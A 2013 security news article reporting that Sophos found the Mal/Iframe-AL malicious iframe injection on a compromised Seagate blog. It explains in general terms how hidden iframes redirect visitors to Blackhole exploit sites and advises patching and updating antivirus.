Antivirus watchdog Sophos is reporting rogue Apache modules being distributed on several compromised mainstream websites including a Seagate blog. Sophos Labs reported that it has been tracking an infection of the Mal/Iframe-Al injection framework on the Seagate site for several months. Mal/Iframe-AL is a generic detection that causes malicious redirects from legitimate websites to sites that host an exploit known as "Blackhole." Per this story: Seagate was informed of the breach back in February, but so far, the company has failed to remove the malicious iFrame detected by Sophos as Mal/Iframe-AL.
This unwanted detection of a malware iframe can generally be observed on two types of files: raw Javascript containing maliciously pre-pended code, and HTML web pages. A malicious i-Frame (inline frame on the web page) can be overlayed on the legitimate content of the page. A malware programmer can make the inline frame as small as one pixel square, making it invisible to the user, but allowing malicious content to be uploaded to your computer without visibly transporting the user to the malicious source of the code. If a website doesn't check search terms adequately for obfuscated Javascript, the IFrame data is stored and passed on. (See, this When someone then searches for "malware IFrame" and clicks a result, the attack is initiated directly from the search result, because the browser can read the obfuscated Javascript - even if you can't. See this Guardian.uk story "What's an I-Frame Attack, and why should I care?" for more information.
The Mal/Iframe-AL code located on the Seagate Blog and reported by Sophos on March 15, 2013, is blocked by Sophos EndUser Protection. To guard against rogue code being downloaded to your computer, be sure that your OS is updated with all current security patches, and that you've updated the latest virus detection patterns for your antivirus / anti-malware protection clients.
Comments